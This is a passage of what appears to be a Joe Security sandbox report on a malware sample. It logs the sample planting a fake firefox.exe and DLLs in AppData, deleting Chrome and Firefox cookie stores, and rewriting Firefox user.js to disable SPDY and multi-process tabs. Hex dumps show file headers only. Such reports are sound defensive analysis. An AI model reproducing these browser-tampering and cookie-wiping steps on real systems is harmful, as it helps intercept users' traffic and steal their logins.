0 25792 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 27 bb 0a c1 63 da 64 92 63 da 64 92 63 da 64 92 0e 87 64 93 62 da 64 92 0e 87 60 93 61 da 64 92 0e 87 9b 92 62 da 64 92 0e 87 66 93 62 da 64 92 52 69 63 68 63 da 64 92 50 45 00 00 4c 01 02 00 f5 9a 99 57 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0e 00 00 22 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 10 00 00 00 40 00 00 00 00 00 10 00 10 00 00 00 02 00 00 0a 00 00 00 0a 00 00
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......'...c.d.c.d.c.d...d.b.d... .a.d.....b.d...f.b.d.Richc.d.PE..L......W...........!....."...................@.....................
success or wait 1 2E30C7 CopyFileA
C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-crt-private-l1-1-0.dll
0 65536 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 27 bb 0a c1 63 da 64 92 63 da 64 92 63 da 64 92 0e 87 64 93 62 da 64 92 0e 87 60 93 61 da 64 92 0e 87 9b 92 62 da 64 92 0e 87 66 93 62 da 64 92 52 69 63 68 63 da 64 92 50 45 00 00 4c 01 02 00 ce 94 99 57 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0e 00 00 da 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 0a 00 00 00 0a 00 00
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......'...c.d.c.d.c.d...d.b.d... .a.d.....b.d...f.b.d.Richc.d.PE..L......W...........!...............................................
success or wait 2 2E30C7 CopyFileA
File Path Offset Length Value Ascii Completion CountSourceAddress Symbol
Copyright Joe Security LLC 2018 Page 136 of 149
C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-crt-process-l1-1-0.dll
0 19136 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 27 bb 0a c1 63 da 64 92 63 da 64 92 63 da 64 92 0e 87 64 93 62 da 64 92 0e 87 60 93 61 da 64 92 0e 87 9b 92 62 da 64 92 0e 87 66 93 62 da 64 92 52 69 63 68 63 da 64 92 50 45 00 00 4c 01 02 00 ce 94 99 57 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0e 00 00 08 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 10 00 00 00 20 00 00 00 00 00 10 00 10 00 00 00 02 00 00 0a 00 00 00 0a 00 00
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......'...c.d.c.d.c.d...d.b.d... .a.d.....b.d...f.b.d.Richc.d.PE..L......W...........!......................... .....................
success or wait 1 2E30C7 CopyFileA
C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-crt-runtime-l1-1-0.dll
0 22720 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 27 bb 0a c1 63 da 64 92 63 da 64 92 63 da 64 92 0e 87 64 93 62 da 64 92 0e 87 60 93 61 da 64 92 0e 87 9b 92 62 da 64 92 0e 87 66 93 62 da 64 92 52 69 63 68 63 da 64 92 50 45 00 00 4c 01 02 00 cf 94 99 57 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0e 00 00 16 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 10 00 00 00 30 00 00 00 00 00 10 00 10 00 00 00 02 00 00 0a 00 00 00 0a 00 00
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......'...c.d.c.d.c.d...d.b.d... .a.d.....b.d...f.b.d.Richc.d.PE..L......W...........!.........................0.....................
success or wait 1 2E30C7 CopyFileA
File Path Offset Length Value Ascii Completion CountSourceAddress Symbol
Copyright Joe Security LLC 2018 Page 137 of 149
C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-crt-stdio-l1-1-0.dll
0 24256 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 27 bb 0a c1 63 da 64 92 63 da 64 92 63 da 64 92 0e 87 64 93 62 da 64 92 0e 87 60 93 61 da 64 92 0e 87 9b 92 62 da 64 92 0e 87 66 93 62 da 64 92 52 69 63 68 63 da 64 92 50 45 00 00 4c 01 02 00 ea 9a 99 57 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0e 00 00 1c 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 10 00 00 00 30 00 00 00 00 00 10 00 10 00 00 00 02 00 00 0a 00 00 00 0a 00 00
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......'...c.d.c.d.c.d...d.b.d... .a.d.....b.d...f.b.d.Richc.d.PE..L......W...........!.........................0.....................
success or wait 1 2E30C7 CopyFileA
C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-crt-string-l1-1-0.dll
0 24256 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 27 bb 0a c1 63 da 64 92 63 da 64 92 63 da 64 92 0e 87 64 93 62 da 64 92 0e 87 60 93 61 da 64 92 0e 87 9b 92 62 da 64 92 0e 87 66 93 62 da 64 92 52 69 63 68 63 da 64 92 50 45 00 00 4c 01 02 00 da 9a 99 57 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0e 00 00 1c 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 10 00 00 00 30 00 00 00 00 00 10 00 10 00 00 00 02 00 00 0a 00 00 00 0a 00 00
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......'...c.d.c.d.c.d...d.b.d... .a.d.....b.d...f.b.d.Richc.d.PE..L......W...........!.........................0.....................
success or wait 1 2E30C7 CopyFileA
File Path Offset Length Value Ascii Completion CountSourceAddress Symbol
Copyright Joe Security LLC 2018 Page 138 of 149
C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-crt-time-l1-1-0.dll
0 20672 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 27 bb 0a c1 63 da 64 92 63 da 64 92 63 da 64 92 0e 87 64 93 62 da 64 92 0e 87 60 93 61 da 64 92 0e 87 9b 92 62 da 64 92 0e 87 66 93 62 da 64 92 52 69 63 68 63 da 64 92 50 45 00 00 4c 01 02 00 ce 94 99 57 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0e 00 00 0e 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 10 00 00 00 20 00 00 00 00 00 10 00 10 00 00 00 02 00 00 0a 00 00 00 0a 00 00
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......'...c.d.c.d.c.d...d.b.d... .a.d.....b.d...f.b.d.Richc.d.PE..L......W...........!......................... .....................
success or wait 1 2E30C7 CopyFileA
C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-crt-utility-l1-1-0.dll
0 18624 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 27 bb 0a c1 63 da 64 92 63 da 64 92 63 da 64 92 0e 87 64 93 62 da 64 92 0e 87 60 93 61 da 64 92 0e 87 9b 92 62 da 64 92 0e 87 66 93 62 da 64 92 52 69 63 68 63 da 64 92 50 45 00 00 4c 01 02 00 11 9b 99 57 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0e 00 00 06 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 10 00 00 00 20 00 00 00 00 00 10 00 10 00 00 00 02 00 00 0a 00 00 00 0a 00 00
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......'...c.d.c.d.c.d...d.b.d... .a.d.....b.d...f.b.d.Richc.d.PE..L......W...........!......................... .....................
success or wait 1 2E30C7 CopyFileA
C:\Users\user\AppData\Roaming\F48A04623C4E0000\dependentlibs.list
0 11 4c 4f 4c 5f 44 4c 4c 2e 64 6c 6c
LOL_DLL.dll success or wait 1 2E30C7 CopyFileA
File Path Offset Length Value Ascii Completion CountSourceAddress Symbol
Copyright Joe Security LLC 2018 Page 139 of 149
C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exe
0 65536 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 18 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d4 23 89 84 90 42 e7 d7 90 42 e7 d7 90 42 e7 d7 99 3a 74 d7 9e 42 e7 d7 0e e2 20 d7 91 42 e7 d7 ab 1c e4 d6 96 42 e7 d7 ab 1c e3 d6 9d 42 e7 d7 ab 1c e6 d6 94 42 e7 d7 ab 1c e2 d6 8f 42 e7 d7 fd 1f e6 d6 94 42 e7 d7 05 1c e6 d6 93 42 e7 d7 90 42 e6 d7 b1 43 e7 d7 05 1c e9 d6 e3 42 e7 d7 05 1c e7 d6 91 42 e7 d7 02 1c 18 d7 91 42 e7 d7 05 1c e5 d6 91 42 e7 d7 52 69 63 68 90 42 e7
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........#...B...B...B...:t..B.... ..B.......B.......B.......B.......B.......B.......B...B...C.......B.......B.......B.......B..Rich.B.
success or wait 9 2E30C7 CopyFileA
C:\Users\user\AppData\Roaming\F48A04623C4E0000\gaddafi-sarkozy-handshake.jpg
0 22117 ff d8 ff e0 00 10 4a 46 49 46 00 01 02 00 00 01 00 01 00 00 ff db 00 43 00 0a 07 07 08 07 06 0a 08 08 08 0b 0a 0a 0b 0e 18 10 0e 0d 0d 0e 1d 15 16 11 18 23 1f 25 24 22 1f 22 21 26 2b 37 2f 26 29 34 29 21 22 30 41 31 34 39 3b 3e 3e 3e 25 2e 44 49 43 3c 48 37 3d 3e 3b ff db 00 43 01 0a 0b 0b 0e 0d 0e 1c 10 10 1c 3b 28 22 28 3b 3b 3b 3b 3b 3b 3b 3b 3b 3b 3b 3b 3b 3b 3b 3b 3b 3b 3b 3b 3b 3b 3b 3b 3b 3b 3b 3b 3b 3b 3b 3b 3b 3b 3b 3b 3b 3b 3b 3b 3b 3b 3b 3b 3b 3b 3b 3b 3b 3b ff c0 00 11 08 01 59 01 cc 03 01 22 00 02 11 01 03 11 01 ff c4 00 1f 00 00 01 05 01 01 01 01 01 01 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 0a 0b ff c4 00 b5 10 00 02 01 03 03 02 04 03 05 05 04 04 00 00 01 7d 01 02 03 00 04 11 05 12 21 31 41 06 13 51 61 07 22 71 14 32 81 91 a1 08
......JFIF.............C......
.....................#.%$"."!&+7/&)4)!"0A149;>>>%.DIC<H7=>;...C...........;("(;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;......Y...."............................................................}........!1A..Qa."q.2....
success or wait 1 2E30C7 CopyFileA
File Path Offset Length Value Ascii Completion CountSourceAddress Symbol
Copyright Joe Security LLC 2018 Page 140 of 149
C:\Users\user\AppData\Roaming\F48A04623C4E0000\LOL_DLL.dll
0 65536 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 0a 00 00 00 01 00 00 00 00 00 00 00 00 00 e0 00 0e 23 0b 01 02 18 00 0e 00 00 00 b4 01 00 00 02 00 00 60 10 00 00 00 10 00 00 00 20 00 00 00 00 e0 6e 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 40 02 00 00 04 00 00 73 ac 02 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 f0 01 00 48 00 00
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..................#................ ........ [email protected]......... .........................H..
success or wait 2 2E30C7 CopyFileA
C:\Users\user\AppData\Roaming\F48A04623C4E0000\mozglue.dll
0 65536 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 de ac ff e9 9a cd 91 ba 9a cd 91 ba 9a cd 91 ba 93 b5 02 ba 8a cd 91 ba 04 6d 56 ba 98 cd 91 ba a1 93 92 bb 94 cd 91 ba a1 93 95 bb 91 cd 91 ba a1 93 90 bb 9e cd 91 ba a1 93 94 bb 95 cd 91 ba f7 90 90 bb 93 cd 91 ba 9a cd 90 ba 29 cd 91 ba 0f 93 9f bb 89 cd 91 ba 0f 93 91 bb 9b cd 91 ba 08 93 6e ba 9b cd 91 ba 0f 93 93 bb 9b cd 91 ba 52 69 63 68 9a cd 91 ba 00 00 00 00 00 00 00
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$................................mV.................................................).....................n.............Rich...........
success or wait 3 2E30C7 CopyFileA
File Path Offset Length Value Ascii Completion CountSourceAddress Symbol
Copyright Joe Security LLC 2018 Page 141 of 149
C:\Users\user\AppData\Roaming\F48A04623C4E0000\msvcp140.dll
0 65536 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 4a bf 9e eb 0e de f0 b8 0e de f0 b8 0e de f0 b8 d3 21 3b b8 0c de f0 b8 07 a6 63 b8 16 de f0 b8 35 80 f1 b9 0d de f0 b8 0e de f1 b8 b1 de f0 b8 35 80 f3 b9 07 de f0 b8 35 80 f4 b9 02 de f0 b8 35 80 f5 b9 18 de f0 b8 35 80 f8 b9 76 de f0 b8 35 80 f0 b9 0f de f0 b8 35 80 0f b8 0f de f0 b8 35 80 f2 b9 0f de f0 b8 52 69 63 68 0e de f0 b8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......J................!;.......c.....5...............5.......5.......5.......5...v...5.......5.......5.......Rich...................
success or wait 7 2E30C7 CopyFileA
C:\Users\user\AppData\Roaming\F48A04623C4E0000\msvcr110.dll
0 65536 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 78 8c 5f 27 3c ed 31 74 3c ed 31 74 3c ed 31 74 3c ed 30 74 8e ed 31 74 c0 9a 88 74 3f ed 31 74 cd 2b ff 74 d7 ec 31 74 cd 2b fc 74 5d ed 31 74 cd 2b e2 74 0b ed 31 74 cd 2b fe 74 84 ed 31 74 cd 2b fb 74 3d ed 31 74 cd 2b f8 74 3d ed 31 74 cd 2b fd 74 3d ed 31 74 52 69 63 68 3c ed 31 74 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 8e 85 98 50 00 00 00
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......x._'<.1t<.1t<.1t<.0t..1t...t?.1t.+.t..1t.+.t].1t.+.t..1t.+.t..1t.+.t=.1t.+.t=.1t.+.t=.1tRich<.1t................PE..L......P...
success or wait 14 2E30C7 CopyFileA
File Path Offset Length Value Ascii Completion CountSourceAddress Symbol
Copyright Joe Security LLC 2018 Page 142 of 149
C:\Users\user\AppData\Roaming\F48A04623C4E0000\ucrtbase.dll
0 65536 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 90 60 9b 4d d4 01 f5 1e d4 01 f5 1e d4 01 f5 1e dd 79 66 1e e7 01 f5 1e d4 01 f4 1e 5a 01 f5 1e f3 c7 8b 1e d5 01 f5 1e b9 5c f1 1f c7 01 f5 1e b9 5c f5 1f d5 01 f5 1e b9 5c f6 1f 8a 01 f5 1e b9 5c f0 1f 82 01 f5 1e b9 5c fb 1f b7 03 f5 1e b9 5c 0a 1e d5 01 f5 1e b9 5c f7 1f d5 01 f5 1e 52 69 63 68 d4 01 f5 1e 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 fc 94 99 57 00 00 00
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........ .M.............yf.........Z............\.......\.......\.......\.......\.......\.......\......Rich............PE..L......W...
success or wait 14 2E30C7 CopyFileA
C:\Users\user\AppData\Roaming\F48A04623C4E0000\vcruntime140.dll
0 65536 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 63 c7 c3 9a 27 a6 ad c9 27 a6 ad c9 27 a6 ad c9 fa 59 66 c9 25 a6 ad c9 2e de 3e c9 2c a6 ad c9 27 a6 ac c9 0f a6 ad c9 1c f8 a9 c8 37 a6 ad c9 1c f8 ae c8 34 a6 ad c9 1c f8 a8 c8 23 a6 ad c9 1c f8 a5 c8 3f a6 ad c9 1c f8 ad c8 26 a6 ad c9 1c f8 52 c9 26 a6 ad c9 1c f8 af c8 26 a6 ad c9 52 69 63 68 27 a6 ad c9 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......c...'...'...'....Yf.%.....>.,...'...........7.......4.......#.......?.......&.....R.&.......&...Rich'...................PE..L..
success or wait 2 2E30C7 CopyFileA
C:\Users\user~1\AppData\Local\Temp\F48A04623C4E0000 unknown 49 43 3a 5c 55 73 65 72 73 5c 4c 55 4b 45 54 41 7e 31 5c 41 70 70 44 61 74 61 5c 4c 6f 63 61 6c 5c 54 65 6d 70 5c 69 73 2d 37 49 32 53 53 2e 74 6d 70
C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp
success or wait 1 2E43AA WriteFile
File Path Offset Length Value Ascii Completion CountSourceAddress Symbol
File Path Offset Length Completion CountSourceAddress Symbol
C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\LOL_DLL.dll unknown 65536 success or wait 2 135135A ReadFile
File ReadFile Read
Copyright Joe Security LLC 2018 Page 143 of 149
File ActivitiesFile Activities
Start time: 14:49:26
Start date: 07/05/2018
Path: C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exe
Wow64 process (32bit): false
Commandline: C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exe
Imagebase: 0xfa0000
File size: 531408 bytes
MD5 hash: 52FFABA4273678BAE75442F2BC85B470
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: low
File Path Offset Length Completion CountSourceAddress Symbol
C:\Users\user\AppData\Roaming\F48A04623C4E0000\LOL_DLL.dll unknown 65536 success or wait 2 FA135A ReadFile
File ActivitiesFile Activities
Start time: 14:49:26
Start date: 07/05/2018
Path: C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exe
Wow64 process (32bit): false
Commandline: 'C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exe'
Imagebase: 0xfa0000
File size: 531408 bytes
MD5 hash: 52FFABA4273678BAE75442F2BC85B470
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: low
File Path Access Attributes Options Completion CountSourceAddress Symbol
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\user.js
read attributes and synchronize and generic read and generic write
normal synchronous io non alert and non directory file
success or wait 1 383AFC CreateFileA
C:\Users\user~1\AppData\Local\Temp\F48A04623C4E000032 read attributes and synchronize and generic write
normal synchronous io non alert and non directory file
success or wait 1 38324B CreateFileA
File Path Completion CountSourceAddress Symbol
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies success or wait 1 38381B DeleteFileA
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\cookies.sqlite success or wait 1 383AB6 DeleteFileA
Analysis Process: firefox.exe PID: 3948 Parent PID: 3844Analysis Process: firefox.exe PID: 3948 Parent PID: 3844
General
File ReadFile Read
Analysis Process: firefox.exe PID: 3964 Parent PID: 1376Analysis Process: firefox.exe PID: 3964 Parent PID: 1376
General
File CreatedFile Created
File DeletedFile Deleted
File WrittenFile Written
Copyright Joe Security LLC 2018 Page 144 of 149
Registry ActivitiesRegistry Activities
File Path Offset Length Value Ascii Completion CountSourceAddress Symbol
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\user.js
unknown 349 75 73 65 72 5f 70 72 65 66 28 22 6e 65 74 77 6f 72 6b 2e 68 74 74 70 2e 73 70 64 79 2e 65 6e 61 62 6c 65 64 2e 76 33 2d 31 22 2c 20 66 61 6c 73 65 29 3b 0d 0a 75 73 65 72 5f 70 72 65 66 28 22 6e 65 74 77 6f 72 6b 2e 68 74 74 70 2e 73 70 64 79 2e 65 6e 61 62 6c 65 64 2e 76 33 22 2c 20 66 61 6c 73 65 29 3b 0d 0a 75 73 65 72 5f 70 72 65 66 28 22 6e 65 74 77 6f 72 6b 2e 68 74 74 70 2e 73 70 64 79 2e 65 6e 61 62 6c 65 64 22 2c 20 66 61 6c 73 65 29 3b 0d 0a 75 73 65 72 5f 70 72 65 66 28 22 62 72 6f 77 73 65 72 2e 74 61 62 73 2e 72 65 6d 6f 74 65 2e 61 75 74 6f 73 74 61 72 74 22 2c 20 66 61 6c 73 65 29 3b 0d 0a 75 73 65 72 5f 70 72 65 66 28 22 62 72 6f 77 73 65 72 2e 74 61 62 73 2e 72 65 6d 6f 74 65 2e 61 75 74 6f 73 74 61 72 74 2e 32 22 2c 20 66 61 6c 73 65 29
user_pref("network.http.spdy.enabled.v3-1", false);..user_pref("network.http.spdy.enabled.v3", false);..user_pref("network.http.spdy.enabled", false);..user_pref("browser.tabs.remote.autostart", false);..user_pref("browser.tabs.remote.autostart.2", false)
success or wait 1 383BBD WriteFile
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\user.js
unknown 19 23 46 34 38 41 30 34 36 32 33 43 34 45 30 30 30 30 0d 0a
#F48A04623C4E0000.. success or wait 1 383BDB WriteFile
C:\Users\user~1\AppData\Local\Temp\F48A04623C4E000032 unknown 517120 0b 6e a8 41 33 34 36 32 37 43 34 45 cf cf 30 30 fe 34 38 41 30 34 36 32 73 43 34 45 30 30 30 30 46 34 38 41 30 34 36 32 33 43 34 45 30 30 30 30 46 34 38 41 30 34 36 32 33 43 34 45 c0 30 30 30 48 2b 82 4f 30 80 3f ff 12 fb 35 09 fd 11 64 58 2f 47 18 31 42 5b 51 40 52 2e 14 26 51 5e 5e 5f 32 14 5a 24 10 46 43 5c 13 2a 5a 65 74 7f 63 10 2b 5b 5c 24 1e 39 3b 38 17 43 34 45 30 30 30 30 ae ec 8c 61 9c 8d ec 41 9f fa ee 36 9c 89 ea 43 1b 4b 2d 32 8a 8d ec 41 6e 3c 23 36 95 89 ea 43 1b 4b 2c 32 c1 8d ec 41 96 82 6d 36 9f 89 ea 43 e3 f5 71 32 9b 8d ec 41 9f fa ef 36 f2 89 ea 43 c9 62 2c 32 99 8d ec 41 bc 15 21 36 8a 89 ea 43 8c 63 2b 32 9d 8d ec 41 f9 14 22 36 9d 89 ea 43 14 5d 5b 29 9c 8d ec 41 33 43 34 45 30 30 30 30 16 71 38 41 7c 35 33 32 42 c7 d9 1f 30 30 